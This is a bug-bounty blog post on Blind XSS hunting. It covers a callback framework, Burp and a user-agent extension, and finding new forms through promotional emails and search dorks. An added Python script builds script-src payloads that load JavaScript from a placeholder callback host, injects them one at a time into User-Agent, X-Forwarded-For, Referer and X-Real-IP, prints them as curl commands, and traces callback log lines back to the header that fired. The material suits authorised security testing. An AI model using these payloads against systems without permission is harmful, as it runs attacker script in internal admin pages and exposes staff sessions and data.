Many people ask me how I perform Blind XSS testing and what tools I use to get results. In this post I explain how I achieve Blind XSS and which tools I use.
Tools I use to get Blind XSS results
- www.blindf.com (A simple but effective framework)
- Burp Suite
- Custom UserAgent String (Firefox extension) [https://addons.mozilla.org/en-US/firefox/addon/custom-user-agent-revived/]
www.blindf.com is a simple and effective framework: if the XSS payload never fires, it can still catch a Blind HTML Injection, so you have a second chance at a finding. Another good thing is that once Blind HTML Injection fires you know the injection point reaches a rendered page, so you can try different Blind XSS payloads against that same point.
Burp Suite: I use Burp to modify request headers such as User-Agent and X-Forwarded-For and put my Blind XSS payloads in them. These headers are commonly stored (access logs, analytics, support tooling) and rendered later in an internal panel you cannot see, which is why the payload fires out of band.
Custom UserAgent String: a very useful browser extension; you can replace the User-Agent value right from the browser if you do not want to use Burp. Just put your Blind XSS payload in the extension's settings and browse your target.
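The header-injection approach above has one practical problem: a Blind XSS callback may arrive days later, and if every request carried the same payload in four headers you will not know which header, or which target, actually rendered it. The following is an added example (not the blog author's tooling and not part of the blindf.com framework) that tags each probe so the callback log can be traced back to the exact injection point. CALLBACK_HOST, the target URL and the access-log line are placeholders and constructed sample data.

```python
"""
Tagged Blind XSS header probes.

One request per candidate header, each carrying a payload whose script path
encodes a unique tag, plus a resolver that maps a line from the callback
server's access log back to the target and header that fired.

Added example, not the blog author's tooling. CALLBACK_HOST is a placeholder
for a listener you control (blindf.com or your own server).
"""
import hashlib
import re
import shlex
from typing import Dict, List, Optional, Tuple

CALLBACK_HOST = "bxss.example"          # assumed placeholder for your listener
BENIGN_UA = "Mozilla/5.0 (bxss-probe)"  # keeps non-injected headers realistic

# Headers that applications commonly store and later render in admin/log views.
INJECTION_HEADERS = ("User-Agent", "X-Forwarded-For", "Referer", "X-Real-IP")


def make_tag(target: str, header: str) -> str:
    """Stable 8-hex tag for (target, header): same input, same tag."""
    return hashlib.sha1(f"{target}|{header}".encode()).hexdigest()[:8]


def build_payload(tag: str) -> str:
    """External-script payload; the tag rides in the path so the callback log shows it."""
    return f'"><script src=//{CALLBACK_HOST}/{tag}.js></script>'


def tagged_probes(target: str, headers=INJECTION_HEADERS) -> Tuple[List[Dict[str, str]], Dict[str, Dict[str, str]]]:
    """Return one header-set per injection point and a tag -> origin registry.

    Only one header per request carries the payload, so a later callback maps to
    exactly one header rather than "one of the four I sent".
    """
    registry: Dict[str, Dict[str, str]] = {}
    probes: List[Dict[str, str]] = []
    for header in headers:
        tag = make_tag(target, header)
        hdrs = {"User-Agent": BENIGN_UA}
        hdrs[header] = build_payload(tag)   # overwrites User-Agent when that is the probe
        registry[tag] = {"target": target, "header": header}
        probes.append(hdrs)
    return probes, registry


def as_curl(target: str, headers: Dict[str, str]) -> str:
    """Render a probe as a curl command (for pasting, or to replay in Burp Repeater)."""
    parts = ["curl", "-s", "-o", "/dev/null"]
    for k, v in headers.items():
        parts += ["-H", f"{k}: {v}"]
    parts.append(target)
    return " ".join(shlex.quote(p) for p in parts)


# Common-log-format line as written by the callback server: the request path
# carries the tag and the Referer shows where the payload actually executed.
LOG_RE = re.compile(r'"GET /(?P<tag>[0-9a-f]{8})\.js HTTP/1\.[01]" \d{3} \d+ "(?P<referer>[^"]*)"')


def resolve_hit(log_line: str, registry: Dict[str, Dict[str, str]]) -> Optional[Dict[str, str]]:
    """Map one callback-log line to the probe that caused it (None if unrelated)."""
    m = LOG_RE.search(log_line)
    if not m or m.group("tag") not in registry:
        return None
    origin = dict(registry[m.group("tag")])
    origin["fired_at"] = m.group("referer")  # the internal page that rendered the stored header
    return origin


if __name__ == "__main__":
    target = "https://target.example/contact"  # placeholder target
    probes, registry = tagged_probes(target)
    for p in probes:
        print(as_curl(target, p))

    # Constructed access-log line: the X-Forwarded-For probe rendered in an admin view.
    tag = make_tag(target, "X-Forwarded-For")
    line = (f'203.0.113.7 - - [10/Oct/2023:12:00:01 +0000] "GET /{tag}.js HTTP/1.1" '
            f'200 512 "https://admin.target.example/visitor-log" "Mozilla/5.0"')
    print(resolve_hit(line, registry))
```

Sending one header at a time costs a few extra requests but turns a vague "something fired" into "the X-Forwarded-For value of the contact form rendered in /visitor-log", which is what a triager needs. The Referer of the callback request is the most useful field in the log: it tells you which internal page executed the payload, which is often the only evidence you get that the sink is an admin panel.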
How I find endpoints:
- I follow my target on Twitter so that I get information about their latest or upcoming products (sometimes new forms such as surveys and feedback pages).
- Most important: do not delete promotional emails. You will find new forms in them to test for Blind XSS. I have earned more than $5000 for Blind XSS found through promotional emails.
- There are two approaches. First, go with the flow of the website. Second, perform an action against the website so that you receive an email and, probably, a new form. For example, you performed some action and an admin blocked your account; you then get an email saying that if this was a mistake, you should fill in the form below.
- Try to find forms using Google search. I use this dork: site:xyz.com intext:Firstname
- There are other well-known methods, such as extracting endpoints from JavaScript files and from the Wayback Machine.
I hope this information helps you find Blind XSS and Blind HTML Injection. You can also find SSRF using the above methods: a stored header or form field that a back-end later fetches as a URL will reach your listener in the same out-of-band way.